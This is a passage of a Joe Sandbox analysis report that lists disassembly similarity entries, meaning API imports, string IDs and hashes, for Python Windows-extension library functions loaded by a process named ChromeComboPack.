                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Size$Arg_Err_ParseTuple_$Sequence_malloc$ClearReferenceString$AllocateCheckCopyDeallocInitializeLengthTuplememset
                                                                                                                                                                                                                                                • String ID: (bbbbbb)O:SID$AllocateAndInitializeSid$SID buffer size beyond INT_MAX$s#:SID$sub authorities must be a sequence of integers.$sub authorities sequence size must be <= 8$|llllllll:SID$|n:SID
                                                                                                                                                                                                                                                • API String ID: 2034972351-3682999398
                                                                                                                                                                                                                                                • Opcode ID: 525610387b68ad0ded5125966a10e9109dc3d848910984cab617d3c0f64cd283
                                                                                                                                                                                                                                                • Instruction ID: d258ba723f17cb58f3ccc539914db944fd0c7319554ea1b2d06473c4276a789a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 525610387b68ad0ded5125966a10e9109dc3d848910984cab617d3c0f64cd283
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A813F37B0AA42A9EB58CF21E4502B977E4FB48B88F844576EA4D47B58EF3CE504C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorSecurityfree$DaclErr_String$Arg_GroupLengthOwnerParseTupleValid
                                                                                                                                                                                                                                                • String ID: SetSecurityDescriptorDacl$The object is not a PyACL object$iOi:SetSecurityDescriptorDacl
                                                                                                                                                                                                                                                • API String ID: 1359849467-4100764314
                                                                                                                                                                                                                                                • Opcode ID: 3e808ce79b7076bcc899e60ba21c05a75609f6a86dc757a742ffb64fe4bf2a7a
                                                                                                                                                                                                                                                • Instruction ID: 653f6fefcab0a196b09848d8b0ed8648558c950a80e680f893298bca10a1b6ad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e808ce79b7076bcc899e60ba21c05a75609f6a86dc757a742ffb64fe4bf2a7a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50516127B0AA12A5FB589F61D9602FC2BA0BF44F84F8854B1DD0E57A54DF3CE546C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                • PyUnicode_FromWideChar.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1CC
                                                                                                                                                                                                                                                • PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                • _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                • PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                • _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unicode_$BuildCharDeallocDecodeErr_ErrorFormatFreeFromLastLocalMessageObjectSizeValue_Wide
                                                                                                                                                                                                                                                • String ID: (iNN)$No error message is available$ignore
                                                                                                                                                                                                                                                • API String ID: 2848599001-37674240
                                                                                                                                                                                                                                                • Opcode ID: 643a50901b2b552bbb88332efe27bb625fe03f62ce5503003692dadae792e0a9
                                                                                                                                                                                                                                                • Instruction ID: 1e6b030c5cc109540bcea404858e635152c16e3c7feb606dd25553935679c04b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 643a50901b2b552bbb88332efe27bb625fe03f62ce5503003692dadae792e0a9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6518767F0A602A9FA589F19E4602796BA1FF94F94F984175DA8E43394DF3CF842C304
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                                                • Opcode ID: 7c6bf0f7975bb5c78eaed7d07f2cd1bf6cc38bd7a7bf042adb2f4977370bd02e
                                                                                                                                                                                                                                                • Instruction ID: da111fcffc5e777bff2ada1d8a7a5ae06d6e8ccf3335b45fa8d47620f8571b67
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c6bf0f7975bb5c78eaed7d07f2cd1bf6cc38bd7a7bf042adb2f4977370bd02e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA31487371AB81A6EB689F60E8607ED7764FB84744F44403ADA4E47A98DF7CD648C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Dict_String$Item$ReadyType_$State_SwapThread$Module_$ErrorFatalFunc$AllocConstantCreate2DeallocDecodeDictErr_LocalUnicode_Value
                                                                                                                                                                                                                                                • String ID: ACLType$Could not initialise the error objects$DEVMODEType$DEVMODEWType$FALSE$HANDLEType$IIDType$OVERLAPPEDType$SECURITY_ATTRIBUTESType$SECURITY_DESCRIPTORType$SIDType$TRUE$TimeType$UnicodeType$WAVEFORMATEXType$WAVE_FORMAT_PCM$com_error$error
                                                                                                                                                                                                                                                • API String ID: 2302314715-2516578290
                                                                                                                                                                                                                                                • Opcode ID: bd69e291b4fc6f872d2f22006123317c71a5d7194922dbda98e03a97dd40cd42
                                                                                                                                                                                                                                                • Instruction ID: f9c3d5ab72b0145bdd4409e2123b0cfead0af45cafe1d075a4d3c11512d64e10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd69e291b4fc6f872d2f22006123317c71a5d7194922dbda98e03a97dd40cd42
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F91EF63B0EA0271E64C8B68E8B41B42B61BF45B65F9807B2D46E421F1EF7CF959C350
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ReadyType_$Dict_String$DeallocItem$State_SwapThread$ErrorFatalFuncImport$AllocCapsule_DecodeFlagsImport_LocalModuleRun_Unicode_Value
                                                                                                                                                                                                                                                • String ID: Exception$Out of memory allocating thread state.$PyWinInterpreterState_Ensure$__builtins__$__name__$builtins$class error(Exception): def __init__(self, *args, **kw): nargs = len(args) if nargs > 0: self.winerror = args[0] else: self.winerror = None if nargs > 1: self.funcname = args[1] else: self.funcname = None if nargs > 2: self.strerror =$com_error$datetime.datetime_CAPI$error$ignore$pywintypes$pywintypes: can not setup interpreter state, as current state is invalid
                                                                                                                                                                                                                                                • API String ID: 3484552599-1312685011
                                                                                                                                                                                                                                                • Opcode ID: e0159ba88e5a1c801be6e97637d547daee22a19625dd7a0b62aed85a2cc0910d
                                                                                                                                                                                                                                                • Instruction ID: 9441525a8e1818d8b5c18cca0c6df8555833379ae0a530292afed16c990a9a72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0159ba88e5a1c801be6e97637d547daee22a19625dd7a0b62aed85a2cc0910d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13A1DB36B0BB02A1EA4C9F14E8742782BA1FF49B95F9941B5C95E436A1EF3CF549C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Dealloc$ImportImport_Module$FreeMem__wcsdup
                                                                                                                                                                                                                                                • String ID: <Error getting traceback - cStringIO.StringIO() failed>$<Error getting traceback - cant find cStringIO.StringIO>$<Error getting traceback - cant find getvalue function>$<Error getting traceback - cant find traceback.print_exception>$<Error getting traceback - cant import cStringIO>$<Error getting traceback - cant import traceback>$<Error getting traceback - cant make print_exception arguments>$<Error getting traceback - getvalue() did not return a string>$<Error getting traceback - getvalue() failed.>$<Error getting traceback - traceback.print_exception() failed>$<NULL!!>$Getting WCHAR string$None is not a valid string in this context$OOOOOi$Objects of type '%s' can not be converted to Unicode.$StringIO$getvalue$print_exception$traceback
                                                                                                                                                                                                                                                • API String ID: 2735870070-2174458333
                                                                                                                                                                                                                                                • Opcode ID: 5fb5c867c60d5da15cf343896854952990717c9409770200ed863035a3dfa842
                                                                                                                                                                                                                                                • Instruction ID: 590a5e3000efa18a41a1c5c012944907cf009403e80c4650a2a78927d3dea7e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fb5c867c60d5da15cf343896854952990717c9409770200ed863035a3dfa842
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F910427B0BA52A1EA5DCF15A8752782BA0BF98F94F8840B1D90E467A5EF3CF505C301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetExplicitEntriesFromAclW.ADVAPI32 ref: 00007FFD8A1925F3
                                                                                                                                                                                                                                                • PyTuple_New.PYTHON312 ref: 00007FFD8A192621
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312 ref: 00007FFD8A1926C7
                                                                                                                                                                                                                                                • Py_BuildValue.PYTHON312 ref: 00007FFD8A192826
                                                                                                                                                                                                                                                • PyTuple_SetItem.PYTHON312 ref: 00007FFD8A19283A
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FFD8A1928AD
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BuildErr_FreeLocalTuple_$DeallocDecodeEntriesErrorExplicitFormatFromItemLastMessageObjectSizeStringUnicode_ValueValue_
                                                                                                                                                                                                                                                • String ID: AccessMode$AccessPermissions$GetExplicitEntriesFromAcl$Identifier$Inheritance$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$Trustee$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}${s:l,s:l,s:l,s:N}
                                                                                                                                                                                                                                                • API String ID: 2366750547-3224252679
                                                                                                                                                                                                                                                • Opcode ID: 6de9b0acf5d9fc3516079e1141f043bffedd79fc0069b299c821f088a3567d20
                                                                                                                                                                                                                                                • Instruction ID: 06fc5a8c9d48119bbf408bba9eb88b023434f355ebdaaa0a21e013f23a1a8856
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6de9b0acf5d9fc3516079e1141f043bffedd79fc0069b299c821f088a3567d20
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6816E77B0AB56A1EB588F11E4602B9BBA0FB89B94F884175CA8D03B64DF3CF454C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Dealloc$String$BuildLongNumber_Value$ArgumentAttrCallCheckClearEval_FormatKeywordsLong_ObjectObject_OccurredSubtypeType_With_mktime64
                                                                                                                                                                                                                                                • String ID: (d)$Objects of type '%s' can not be used as a time object$iiiiiiiii|i$mktime argument out of range$timetuple$year out of range
                                                                                                                                                                                                                                                • API String ID: 374337924-3179837657
                                                                                                                                                                                                                                                • Opcode ID: c35d6597132e819aabd3fc0a246c3c0a8db126465e84e8f8556b1c8a4bbdd07e
                                                                                                                                                                                                                                                • Instruction ID: f69d35b23e3253a01da468786f6eef6ae991d39243fa692b892bff958135b021
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c35d6597132e819aabd3fc0a246c3c0a8db126465e84e8f8556b1c8a4bbdd07e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33918137B0AB42A5EB588F25D8602B87BA4FF89B98F884175D94E46754EF3CF449C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Dealloc$Err_Sequence_String$Arg_FreeParseTuple$CheckEntriesItemKeywordsLocalMem_SizeTuple_freemallocmemset
                                                                                                                                                                                                                                                • String ID: EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}$O:SetEntriesInAcl$Parm must be a list of EXPLICIT_ACCESS dictionaries$SetEntriesInAcl$SetEntriesInAcl: unable to allocate EXPLICIT_ACCESS_W$lllO
                                                                                                                                                                                                                                                • API String ID: 1438466550-1140684800
                                                                                                                                                                                                                                                • Opcode ID: 61683f0335259351e18ceb0c0b5e7f1567f179fc215418459869264315bb2b13
                                                                                                                                                                                                                                                • Instruction ID: 03a429cf6cdabbfe911d38b5510dd3c721752b9dd2e96d2e6a81cc2363eab975
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61683f0335259351e18ceb0c0b5e7f1567f179fc215418459869264315bb2b13
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A816127B0AB82A1EA589F21E4642BA7BA0FF85F84F584175DE4E47754EF3CE444C701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String$Buffer_FormatFromRelease$Arg_BufferCharFreeMem_Object_ParseProgReferenceTupleUnicode_Widemalloc
                                                                                                                                                                                                                                                • String ID: <NULL!!>$Buffer cannot be None$Buffer length can be at most %d characters$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$O|i$string too small - must be at least %d bytes (got %d)
                                                                                                                                                                                                                                                • API String ID: 4105764891-2902820477
                                                                                                                                                                                                                                                • Opcode ID: cda41e970d2cb967eed48b9acbb4b0512a05b68967e54b43242f7ce9b0349404
                                                                                                                                                                                                                                                • Instruction ID: 847111881d4835a75be544827c8680286d4e6d71d9049a0750a760d96aaf70f0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cda41e970d2cb967eed48b9acbb4b0512a05b68967e54b43242f7ce9b0349404
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B81FB27B0AB02A5FB58CF65D8702B82BB5BB84B98F885475DD0E62695DF3CF549C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$DescriptorSecurity$String$Arg_Buffer_ParseReleaseTuplefreemalloc$BufferClearControlDeallocFormatInitializeLengthObject_OccurredReferenceValid
                                                                                                                                                                                                                                                • String ID: Buffer cannot be None$Buffer length can be at most %d characters$Data is not a valid security descriptor$O:SECURITY_DESCRIPTOR$Security descriptor created from a buffer must be self relative$Security descriptors are not supported on this platform$|l:SECURITY_DESCRIPTOR
                                                                                                                                                                                                                                                • API String ID: 929864077-2729865943
                                                                                                                                                                                                                                                • Opcode ID: 6f654bcaa8df546f42f247dd2c27e07188fcf06852b0229ff566bc066e8a319f
                                                                                                                                                                                                                                                • Instruction ID: 8c8f586c27c6aacb6c0b3121c871251ebf31f16a6aa050699b131b2c6689db31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f654bcaa8df546f42f247dd2c27e07188fcf06852b0229ff566bc066e8a319f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6513E23B0AB42A1FA989F15E9643796BA1FF84F80F8850B1D94E43A54EF3CF546C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
